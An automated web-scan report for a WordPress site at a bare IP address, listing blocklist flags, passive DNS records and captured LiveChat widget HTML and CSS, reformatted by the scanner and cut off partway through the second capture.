Overview

URL 198.50.143.158/
IP198.50.143.158
ASNOVH SAS
Location Canada
Report completed2022-11-25 09:31:55 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-25 2 198.50.143.158/ Malware
2022-11-25 2 198.50.143.158/wp-content/themes/frontier/includes/genericons/genericons.cs (...) Malware
2022-11-25 2 198.50.143.158/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11 Malware
2022-11-25 2 198.50.143.158/wp-content/themes/frontier/style.css?ver=1.3.3 Malware
2022-11-25 2 198.50.143.158/wp-includes/js/wp-embed.min.js?ver=5.5.11 Malware
2022-11-25 2 198.50.143.158/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp Malware
mnemonic secure dns  No alerts detected
Quad9 DNS
Scan Date Severity Indicator Comment
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed
2022-11-25 2 198.50.143.158 Sinkholed


Files

No files detected



Passive DNS (16)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS r3.o.lencr.org (6) 344 No data No data 23.36.77.32
mnemonic passive DNS ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
mnemonic passive DNS push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 54.191.210.155
mnemonic passive DNS 198.50.143.158 (13) 0 No data No data 198.50.143.158 Unknown ranking
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-09-09 00:40:21 UTC 2022-11-25 06:26:28 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS api.livechatinc.com (4) 5353 2013-12-20 14:27:35 UTC 2020-05-14 13:42:22 UTC 23.36.79.17
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-11-25 05:51:47 UTC 34.117.237.239
mnemonic passive DNS cdn.livechatinc.com (11) 6288 2012-06-22 08:37:34 UTC 2020-04-29 06:44:28 UTC 23.36.79.16
mnemonic passive DNS accounts.livechatinc.com (1) 7698 2018-09-03 02:09:14 UTC 2020-01-31 06:28:20 UTC 23.36.79.16
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-11-25 06:03:02 UTC 34.102.187.140
mnemonic passive DNS fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-11-25 05:53:13 UTC 142.250.74.10
mnemonic passive DNS api.livechatinc.com (4) 5353 2013-12-20 14:27:35 UTC 2020-05-14 13:42:22 UTC 23.36.79.16
mnemonic passive DNS secure.livechatinc.com (1) 6541 2012-08-20 19:27:12 UTC 2020-04-07 20:28:05 UTC 23.36.79.16
mnemonic passive DNS cdn.livechat-files.com (2) 28080 No data No data 23.36.79.16


Recent reports on same IP/ASN/Domain/Screenshot

Last 1 reports on IP: 198.50.143.158

Date UQ / IDS / BL URL IP
2022-11-25 09:31:55 +0000
0 - 0 - 19 198.50.143.158/ 198.50.143.158

Last 5 reports on ASN: OVH SAS

Date UQ / IDS / BL URL IP
2022-12-01 10:49:00 +0000
0 - 0 - 25 tribelessyouth.org/the-place-of-youth-in-keny (...) 54.36.174.113
2022-12-01 10:44:14 +0000
0 - 0 - 17 www.livebeep.com/lbad/c/4793-7015-10859/?vid= (...) 51.210.122.41
2022-12-01 10:37:48 +0000
0 - 0 - 1 dasman.com.sa/ 54.36.110.222
2022-12-01 10:35:55 +0000
0 - 0 - 2 infosolutions2s.com/ 213.186.33.2
2022-12-01 10:27:31 +0000
0 - 0 - 1 avvocatochiarugi.it/ 54.36.55.215

Last 1 reports on domain: 198.50.143.158

Date UQ / IDS / BL URL IP
2022-11-25 09:31:55 +0000
0 - 0 - 19 198.50.143.158/ 198.50.143.158

No other reports with similar screenshot



JavaScript

Executed Scripts (22)


Executed Evals (0)


Executed Writes (3)

#1 JavaScript::Write (size: 12789, repeated: 1) - SHA256: 46c6aa583fb15e3acc001922868d3db6c30b74e74adee3899f3f31688075ce6e

                                        < !DOCTYPE html >
    < html >
    < head >
    < style >

    /* cyrillic-ext */
    @font - face {
        font - family: 'Noto Sans';
        font - style: normal;
        font - weight: 400;
        font - display: swap;
        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6DRASf6M7VBj.woff2) format('woff2');
                unicode - range: U + 0460 - 052 F, U + 1 C80 - 1 C88, U + 20 B4, U + 2 DE0 - 2 DFF, U + A640 - A69F, U + FE2E - FE2F;
            }
            /* cyrillic */
            @
        font - face {
                font - family: 'Noto Sans';
                font - style: normal;
                font - weight: 400;
                font - display: swap;
                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr4TRASf6M7VBj.woff2) format('woff2');
                        unicode - range: U + 0301, U + 0400 - 045 F, U + 0490 - 0491, U + 04 B0 - 04 B1, U + 2116;
                    }
                    /* devanagari */
                    @
                font - face {
                        font - family: 'Noto Sans';
                        font - style: normal;
                        font - weight: 400;
                        font - display: swap;
                        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr5DRASf6M7VBj.woff2) format('woff2');
                                unicode - range: U + 0900 - 097 F, U + 1 CD0 - 1 CF6, U + 1 CF8 - 1 CF9, U + 200 C - 200 D, U + 20 A8, U + 20 B9, U + 25 CC, U + A830 - A839, U + A8E0 - A8FB;
                            }
                            /* greek-ext */
                            @
                        font - face {
                                font - family: 'Noto Sans';
                                font - style: normal;
                                font - weight: 400;
                                font - display: swap;
                                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6TRASf6M7VBj.woff2) format('woff2');
                                        unicode - range: U + 1 F00 - 1 FFF;
                                    }
                                    /* greek */
                                    @
                                font - face {
                                        font - family: 'Noto Sans';
                                        font - style: normal;
                                        font - weight: 400;
                                        font - display: swap;
                                        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr5jRASf6M7VBj.woff2) format('woff2');
                                                unicode - range: U + 0370 - 03 FF;
                                            }
                                            /* vietnamese */
                                            @
                                        font - face {
                                                font - family: 'Noto Sans';
                                                font - style: normal;
                                                font - weight: 400;
                                                font - display: swap;
                                                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6jRASf6M7VBj.woff2) format('woff2');
                                                        unicode - range: U + 0102 - 0103, U + 0110 - 0111, U + 0128 - 0129, U + 0168 - 0169, U + 01 A0 - 01 A1, U + 01 AF - 01 B0, U + 1E A0 - 1E F9, U + 20 AB;
                                                    }
                                                    /* latin-ext */
                                                    @
                                                font - face {
                                                        font - family: 'Noto Sans';
                                                        font - style: normal;
                                                        font - weight: 400;
                                                        font - display: swap;
                                                        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6zRASf6M7VBj.woff2) format('woff2');
                                                                unicode - range: U + 0100 - 024 F, U + 0259, U + 1E00 - 1E FF, U + 2020, U + 20 A0 - 20 AB, U + 20 AD - 20 CF, U + 2113, U + 2 C60 - 2 C7F, U + A720 - A7FF;
                                                            }
                                                            /* latin */
                                                            @
                                                        font - face {
                                                                font - family: 'Noto Sans';
                                                                font - style: normal;
                                                                font - weight: 400;
                                                                font - display: swap;
                                                                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr5TRASf6M7Q.woff2) format('woff2');
                                                                        unicode - range: U + 0000 - 00 FF, U + 0131, U + 0152 - 0153, U + 02 BB - 02 BC, U + 02 C6, U + 02 DA, U + 02 DC, U + 2000 - 206 F, U + 2074, U + 20 AC, U + 2122, U + 2191, U + 2193, U + 2212, U + 2215, U + FEFF, U + FFFD;
                                                                    }
                                                                    /* cyrillic-ext */
                                                                    @
                                                                font - face {
                                                                        font - family: 'Noto Sans';
                                                                        font - style: normal;
                                                                        font - weight: 700;
                                                                        font - display: swap;
                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVadyBx2pqPIif.woff2) format('woff2');
                                                                                unicode - range: U + 0460 - 052 F, U + 1 C80 - 1 C88, U + 20 B4, U + 2 DE0 - 2 DFF, U + A640 - A69F, U + FE2E - FE2F;
                                                                            }
                                                                            /* cyrillic */
                                                                            @
                                                                        font - face {
                                                                                font - family: 'Noto Sans';
                                                                                font - style: normal;
                                                                                font - weight: 700;
                                                                                font - display: swap;
                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVYNyBx2pqPIif.woff2) format('woff2');
                                                                                        unicode - range: U + 0301, U + 0400 - 045 F, U + 0490 - 0491, U + 04 B0 - 04 B1, U + 2116;
                                                                                    }
                                                                                    /* devanagari */
                                                                                    @
                                                                                font - face {
                                                                                        font - family: 'Noto Sans';
                                                                                        font - style: normal;
                                                                                        font - weight: 700;
                                                                                        font - display: swap;
                                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVZdyBx2pqPIif.woff2) format('woff2');
                                                                                                unicode - range: U + 0900 - 097 F, U + 1 CD0 - 1 CF6, U + 1 CF8 - 1 CF9, U + 200 C - 200 D, U + 20 A8, U + 20 B9, U + 25 CC, U + A830 - A839, U + A8E0 - A8FB;
                                                                                            }
                                                                                            /* greek-ext */
                                                                                            @
                                                                                        font - face {
                                                                                                font - family: 'Noto Sans';
                                                                                                font - style: normal;
                                                                                                font - weight: 700;
                                                                                                font - display: swap;
                                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVaNyBx2pqPIif.woff2) format('woff2');
                                                                                                        unicode - range: U + 1 F00 - 1 FFF;
                                                                                                    }
                                                                                                    /* greek */
                                                                                                    @
                                                                                                font - face {
                                                                                                        font - family: 'Noto Sans';
                                                                                                        font - style: normal;
                                                                                                        font - weight: 700;
                                                                                                        font - display: swap;
                                                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVZ9yBx2pqPIif.woff2) format('woff2');
                                                                                                                unicode - range: U + 0370 - 03 FF;
                                                                                                            }
                                                                                                            /* vietnamese */
                                                                                                            @
                                                                                                        font - face {
                                                                                                                font - family: 'Noto Sans';
                                                                                                                font - style: normal;
                                                                                                                font - weight: 700;
                                                                                                                font - display: swap;
                                                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVa9yBx2pqPIif.woff2) format('woff2');
                                                                                                                        unicode - range: U + 0102 - 0103, U + 0110 - 0111, U + 0128 - 0129, U + 0168 - 0169, U + 01 A0 - 01 A1, U + 01 AF - 01 B0, U + 1E A0 - 1E F9, U + 20 AB;
                                                                                                                    }
                                                                                                                    /* latin-ext */
                                                                                                                    @
                                                                                                                font - face {
                                                                                                                        font - family: 'Noto Sans';
                                                                                                                        font - style: normal;
                                                                                                                        font - weight: 700;
                                                                                                                        font - display: swap;
                                                                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVatyBx2pqPIif.woff2) format('woff2');
                                                                                                                                unicode - range: U + 0100 - 024 F, U + 0259, U + 1E00 - 1E FF, U + 2020, U + 20 A0 - 20 AB, U + 20 AD - 20 CF, U + 2113, U + 2 C60 - 2 C7F, U + A720 - A7FF;
                                                                                                                            }
                                                                                                                            /* latin */
                                                                                                                            @
                                                                                                                        font - face {
                                                                                                                                font - family: 'Noto Sans';
                                                                                                                                font - style: normal;
                                                                                                                                font - weight: 700;
                                                                                                                                font - display: swap;
                                                                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVZNyBx2pqPA.woff2) format('woff2');
                                                                                                                                    unicode - range: U + 0000 - 00 FF, U + 0131, U + 0152 - 0153, U + 02 BB - 02 BC, U + 02 C6, U + 02 DA, U + 02 DC, U + 2000 - 206 F, U + 2074, U + 20 AC, U + 2122, U + 2191, U + 2193, U + 2212, U + 2215, U + FEFF, U + FFFD;
                                                                                                                                }

                                                                                                                                * {
                                                                                                                                    font - family: 'Noto Sans', sans - serif;
                                                                                                                                    box - sizing: border - box; - webkit - font - smoothing: antialiased; - moz - osx - font - smoothing: grayscale; - webkit - tap - highlight - color: transparent;
                                                                                                                                }
                                                                                                                                body {
                                                                                                                                    margin: 0;
                                                                                                                                } < /style> < style data - emotion = "css-global qw898r" > .css - qw898r {
                                                                                                                                    max - width: 100 % ;
                                                                                                                                    position: absolute;
                                                                                                                                    bottom: 0;
                                                                                                                                    z - index: 2;
                                                                                                                                    display: -webkit - box;
                                                                                                                                    display: -webkit - flex;
                                                                                                                                    display: -ms - flexbox;
                                                                                                                                    display: flex; - webkit - align - items: flex - end; - webkit - box - align: flex - end; - ms - flex - align: flex - end;
                                                                                                                                    align - items: flex - end;
                                                                                                                                    will - change: width, height, transform, opacity; - webkit - backface - visibility: hidden;
                                                                                                                                    backface - visibility: hidden;
                                                                                                                                    padding: 0.8e m 0.8e m 0 0.8e m;
                                                                                                                                    right: 0; - webkit - box - pack: end; - ms - flex - pack: end; - webkit - justify - content: flex - end;
                                                                                                                                    justify - content: flex - end;
                                                                                                                                    --primary - color: #427fe1;--secondary-color:# fbfbfb;
                                                                                                                                    --tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global adbqwp">.css-adbqwp{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;min-width:0;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;}</style > < style data - emotion = "css-global 1lrwoq5" > .css - 1 lrwoq5 {
                                                                                                                                    display: -webkit - box;display: -webkit - flex;display: -ms - flexbox;display: flex;min - width: 0;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global z6wmrw">.css-z6wmrw{position:relative;width:255px;height:50px;box-shadow:0 4px 12px rgba(0,0,0,0.3);background:#FFFFFF;border-radius:8px 8px 0px 0px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;padding:0 0.9em;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;border-radius:4px 4px 0px 0px;height:40px;color:#FFFFFF;background-color:#d2a024;}.css-z6wmrw:hover{cursor:pointer;}.css-z6wmrw:focus{outline-style:auto;}</style > < style data - emotion = "css-global 1t5h7yy" > .css - 1 t5h7yy {
                                                                                                                                    margin: 1e m 0;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;white - space: nowrap;overflow: hidden;text - overflow: ellipsis; - webkit - box - flex: 1; - webkit - flex - grow: 1; - ms - flex - positive: 1;flex - grow: 1;font - weight: 700;font - size: 0.9e m;margin - right: 4 px;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;white - space: nowrap;overflow: hidden;text - overflow: ellipsis;
                                                                                                                                } < /style><style data-emotion="css-global 1f0le8r">.css-1f0le8r{-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none;appearance:none;background:transparent;border:0;display:inline-block;margin:0;padding:0.5em;color:inherit;cursor:pointer;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;padding:0 .5em;padding:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;border:0;border-radius:4px;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;}.css-1f0le8r:disabled{cursor:not-allowed;}.css-1f0le8r:focus{outline-style:auto;}</style > < style data - emotion = "css-global kvf2v3" > .css - kvf2v3 {
                                                                                                                                    position: relative;display: -webkit - box;display: -webkit - flex;display: -ms - flexbox;display: flex;width: 24 px;height: 24 px; - webkit - align - items: center; - webkit - box - align: center; - ms - flex - align: center;align - items: center; - webkit - box - pack: center; - ms - flex - pack: center; - webkit - justify - content: center;justify - content: center;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global 1usdo54">.css-1usdo54{display:inline-block;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;width:1em;height:1em;font-size:1.5rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;fill:currentColor;}</style > < style data - emotion = "css-global 1arh9bj" > .css - 1 arh9bj {
                                                                                                                                    opacity: 1; - webkit - transform: scale(1); - moz - transform: scale(1); - ms - transform: scale(1);transform: scale(1);transform - origin: 50 % 50 % ; - webkit - transition: 200 ms cubic - bezier(0.18, 0.89, 0.32, 1.28) 50 ms;transition: 200 ms cubic - bezier(0.18, 0.89, 0.32, 1.28) 50 ms;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global 11h0104">.css-11h0104{position:absolute;z-index:1;left:0;right:0;bottom:1px;-webkit-transition:opacity 150ms cubic-bezier(0.33, 0, 0.67, 1) 50ms;transition:opacity 150ms cubic-bezier(0.33, 0, 0.67, 1) 50ms;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:24px;height:24px;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;opacity:0;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;}</style > < style data - emotion = "css " > < /style> < /head> < body > < div dir = "ltr"
                                                                                                                                role = "main"
                                                                                                                                data - lc - id = "0"
                                                                                                                                data - lc - event = "mouseover:2s8cgnolavl;focus:5t8f5u7n1wa;blur:trc9pdn4okl"
                                                                                                                                class = "css-qw898r eqd5v0k0" > < div class = "css-adbqwp ek650k30" > < div class = "css-1lrwoq5 e108e6fy0" > < /div><div class="css-1lrwoq5 e108e6fy0"><div data-lc-id="1" data-lc-event="click:riintcw2mp;mouseleave:fgt5clwnmqm;mouseenter:wecy49q273;focus:orycyotj3kc;blur:twl9jh1vub" class="css-z6wmrw e16i86ec1"><p class="css-1t5h7yy e16i86ec0">Kami Siap Membantu Anda</p > < button type = "button"
                                                                                                                                aria - label = "Open LiveChat chat widget"
                                                                                                                                class = "e1mwfyk10 css-1f0le8r e1m5b1js0" > < div class = "css-kvf2v3 e1dmt1bi3" > < svg color = "inherit"
                                                                                                                                viewBox = "0 0 32 32"
                                                                                                                                class = "css-1usdo54" > < path fill = "#FFFFFF"
                                                                                                                                d = "M12.63,26.46H8.83a6.61,6.61,0,0,1-6.65-6.07,89.05,89.05,0,0,1,0-11.2A6.5,6.5,0,0,1,8.23,3.25a121.62,121.62,0,0,1,15.51,0A6.51,6.51,0,0,1,29.8,9.19a77.53,77.53,0,0,1,0,11.2,6.61,6.61,0,0,1-6.66,6.07H19.48L12.63,31V26.46" > < /path><path fill="#d2a024" d="M19.57,21.68h3.67a2.08,2.08,0,0,0,2.11-1.81,89.86,89.86,0,0,0,0-10.38,1.9,1.9,0,0,0-1.84-1.74,113.15,113.15,0,0,0-15,0A1.9,1.9,0,0,0,6.71,9.49a74.92,74.92,0,0,0-.06,10.38,2,2,0,0,0,2.1,1.81h3.81V26.5Z" class="css-1arh9bj eam5rsy0"></path > < /svg><div class="css-11h0104 e1dmt1bi2"></div > < /div></button > < /div></div > < /div></div > < /body> < /html>
                                    

#2 JavaScript::Write (size: 12789, repeated: 1) - SHA256: 044646a92be415296c003cc9235a39878a8e490005d93a4656f715461ae64cee

                                        < !DOCTYPE html >
    < html >
    < head >
    < style >

    /* cyrillic-ext */
    @font - face {
        font - family: 'Noto Sans';
        font - style: normal;
        font - weight: 400;
        font - display: swap;
        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6DRASf6M7VBj.woff2) format('woff2');
                unicode - range: U + 0460 - 052 F, U + 1 C80 - 1 C88, U + 20 B4, U + 2 DE0 - 2 DFF, U + A640 - A69F, U + FE2E - FE2F;
            }
            /* cyrillic */
            @
        font - face {
                font - family: 'Noto Sans';
                font - style: normal;
                font - weight: 400;
                font - display: swap;
                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr4TRASf6M7VBj.woff2) format('woff2');
                        unicode - range: U + 0301, U + 0400 - 045 F, U + 0490 - 0491, U + 04 B0 - 04 B1, U + 2116;
                    }
                    /* devanagari */
                    @
                font - face {
                        font - family: 'Noto Sans';
                        font - style: normal;
                        font - weight: 400;
                        font - display: swap;
                        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr5DRASf6M7VBj.woff2) format('woff2');
                                unicode - range: U + 0900 - 097 F, U + 1 CD0 - 1 CF6, U + 1 CF8 - 1 CF9, U + 200 C - 200 D, U + 20 A8, U + 20 B9, U + 25 CC, U + A830 - A839, U + A8E0 - A8FB;
                            }
                            /* greek-ext */
                            @
                        font - face {
                                font - family: 'Noto Sans';
                                font - style: normal;
                                font - weight: 400;
                                font - display: swap;
                                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6TRASf6M7VBj.woff2) format('woff2');
                                        unicode - range: U + 1 F00 - 1 FFF;
                                    }
                                    /* greek */
                                    @
                                font - face {
                                        font - family: 'Noto Sans';
                                        font - style: normal;
                                        font - weight: 400;
                                        font - display: swap;
                                        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr5jRASf6M7VBj.woff2) format('woff2');
                                                unicode - range: U + 0370 - 03 FF;
                                            }
                                            /* vietnamese */
                                            @
                                        font - face {
                                                font - family: 'Noto Sans';
                                                font - style: normal;
                                                font - weight: 400;
                                                font - display: swap;
                                                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6jRASf6M7VBj.woff2) format('woff2');
                                                        unicode - range: U + 0102 - 0103, U + 0110 - 0111, U + 0128 - 0129, U + 0168 - 0169, U + 01 A0 - 01 A1, U + 01 AF - 01 B0, U + 1E A0 - 1E F9, U + 20 AB;
                                                    }
                                                    /* latin-ext */
                                                    @
                                                font - face {
                                                        font - family: 'Noto Sans';
                                                        font - style: normal;
                                                        font - weight: 400;
                                                        font - display: swap;
                                                        src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr6zRASf6M7VBj.woff2) format('woff2');
                                                                unicode - range: U + 0100 - 024 F, U + 0259, U + 1E00 - 1E FF, U + 2020, U + 20 A0 - 20 AB, U + 20 AD - 20 CF, U + 2113, U + 2 C60 - 2 C7F, U + A720 - A7FF;
                                                            }
                                                            /* latin */
                                                            @
                                                        font - face {
                                                                font - family: 'Noto Sans';
                                                                font - style: normal;
                                                                font - weight: 400;
                                                                font - display: swap;
                                                                src: url(https: //cdn.livechatinc.com/widget/o-0IIpQlx3QUlC5A4PNr5TRASf6M7Q.woff2) format('woff2');
                                                                        unicode - range: U + 0000 - 00 FF, U + 0131, U + 0152 - 0153, U + 02 BB - 02 BC, U + 02 C6, U + 02 DA, U + 02 DC, U + 2000 - 206 F, U + 2074, U + 20 AC, U + 2122, U + 2191, U + 2193, U + 2212, U + 2215, U + FEFF, U + FFFD;
                                                                    }
                                                                    /* cyrillic-ext */
                                                                    @
                                                                font - face {
                                                                        font - family: 'Noto Sans';
                                                                        font - style: normal;
                                                                        font - weight: 700;
                                                                        font - display: swap;
                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVadyBx2pqPIif.woff2) format('woff2');
                                                                                unicode - range: U + 0460 - 052 F, U + 1 C80 - 1 C88, U + 20 B4, U + 2 DE0 - 2 DFF, U + A640 - A69F, U + FE2E - FE2F;
                                                                            }
                                                                            /* cyrillic */
                                                                            @
                                                                        font - face {
                                                                                font - family: 'Noto Sans';
                                                                                font - style: normal;
                                                                                font - weight: 700;
                                                                                font - display: swap;
                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVYNyBx2pqPIif.woff2) format('woff2');
                                                                                        unicode - range: U + 0301, U + 0400 - 045 F, U + 0490 - 0491, U + 04 B0 - 04 B1, U + 2116;
                                                                                    }
                                                                                    /* devanagari */
                                                                                    @
                                                                                font - face {
                                                                                        font - family: 'Noto Sans';
                                                                                        font - style: normal;
                                                                                        font - weight: 700;
                                                                                        font - display: swap;
                                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVZdyBx2pqPIif.woff2) format('woff2');
                                                                                                unicode - range: U + 0900 - 097 F, U + 1 CD0 - 1 CF6, U + 1 CF8 - 1 CF9, U + 200 C - 200 D, U + 20 A8, U + 20 B9, U + 25 CC, U + A830 - A839, U + A8E0 - A8FB;
                                                                                            }
                                                                                            /* greek-ext */
                                                                                            @
                                                                                        font - face {
                                                                                                font - family: 'Noto Sans';
                                                                                                font - style: normal;
                                                                                                font - weight: 700;
                                                                                                font - display: swap;
                                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVaNyBx2pqPIif.woff2) format('woff2');
                                                                                                        unicode - range: U + 1 F00 - 1 FFF;
                                                                                                    }
                                                                                                    /* greek */
                                                                                                    @
                                                                                                font - face {
                                                                                                        font - family: 'Noto Sans';
                                                                                                        font - style: normal;
                                                                                                        font - weight: 700;
                                                                                                        font - display: swap;
                                                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVZ9yBx2pqPIif.woff2) format('woff2');
                                                                                                                unicode - range: U + 0370 - 03 FF;
                                                                                                            }
                                                                                                            /* vietnamese */
                                                                                                            @
                                                                                                        font - face {
                                                                                                                font - family: 'Noto Sans';
                                                                                                                font - style: normal;
                                                                                                                font - weight: 700;
                                                                                                                font - display: swap;
                                                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVa9yBx2pqPIif.woff2) format('woff2');
                                                                                                                        unicode - range: U + 0102 - 0103, U + 0110 - 0111, U + 0128 - 0129, U + 0168 - 0169, U + 01 A0 - 01 A1, U + 01 AF - 01 B0, U + 1E A0 - 1E F9, U + 20 AB;
                                                                                                                    }
                                                                                                                    /* latin-ext */
                                                                                                                    @
                                                                                                                font - face {
                                                                                                                        font - family: 'Noto Sans';
                                                                                                                        font - style: normal;
                                                                                                                        font - weight: 700;
                                                                                                                        font - display: swap;
                                                                                                                        src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVatyBx2pqPIif.woff2) format('woff2');
                                                                                                                                unicode - range: U + 0100 - 024 F, U + 0259, U + 1E00 - 1E FF, U + 2020, U + 20 A0 - 20 AB, U + 20 AD - 20 CF, U + 2113, U + 2 C60 - 2 C7F, U + A720 - A7FF;
                                                                                                                            }
                                                                                                                            /* latin */
                                                                                                                            @
                                                                                                                        font - face {
                                                                                                                                font - family: 'Noto Sans';
                                                                                                                                font - style: normal;
                                                                                                                                font - weight: 700;
                                                                                                                                font - display: swap;
                                                                                                                                src: url(https: //cdn.livechatinc.com/widget/o-0NIpQlx3QUlC5A4PNjXhFVZNyBx2pqPA.woff2) format('woff2');
                                                                                                                                    unicode - range: U + 0000 - 00 FF, U + 0131, U + 0152 - 0153, U + 02 BB - 02 BC, U + 02 C6, U + 02 DA, U + 02 DC, U + 2000 - 206 F, U + 2074, U + 20 AC, U + 2122, U + 2191, U + 2193, U + 2212, U + 2215, U + FEFF, U + FFFD;
                                                                                                                                }

                                                                                                                                * {
                                                                                                                                    font - family: 'Noto Sans', sans - serif;
                                                                                                                                    box - sizing: border - box; - webkit - font - smoothing: antialiased; - moz - osx - font - smoothing: grayscale; - webkit - tap - highlight - color: transparent;
                                                                                                                                }
                                                                                                                                body {
                                                                                                                                    margin: 0;
                                                                                                                                } < /style> < style data - emotion = "css-global qw898r" > .css - qw898r {
                                                                                                                                    max - width: 100 % ;
                                                                                                                                    position: absolute;
                                                                                                                                    bottom: 0;
                                                                                                                                    z - index: 2;
                                                                                                                                    display: -webkit - box;
                                                                                                                                    display: -webkit - flex;
                                                                                                                                    display: -ms - flexbox;
                                                                                                                                    display: flex; - webkit - align - items: flex - end; - webkit - box - align: flex - end; - ms - flex - align: flex - end;
                                                                                                                                    align - items: flex - end;
                                                                                                                                    will - change: width, height, transform, opacity; - webkit - backface - visibility: hidden;
                                                                                                                                    backface - visibility: hidden;
                                                                                                                                    padding: 0.8e m 0.8e m 0 0.8e m;
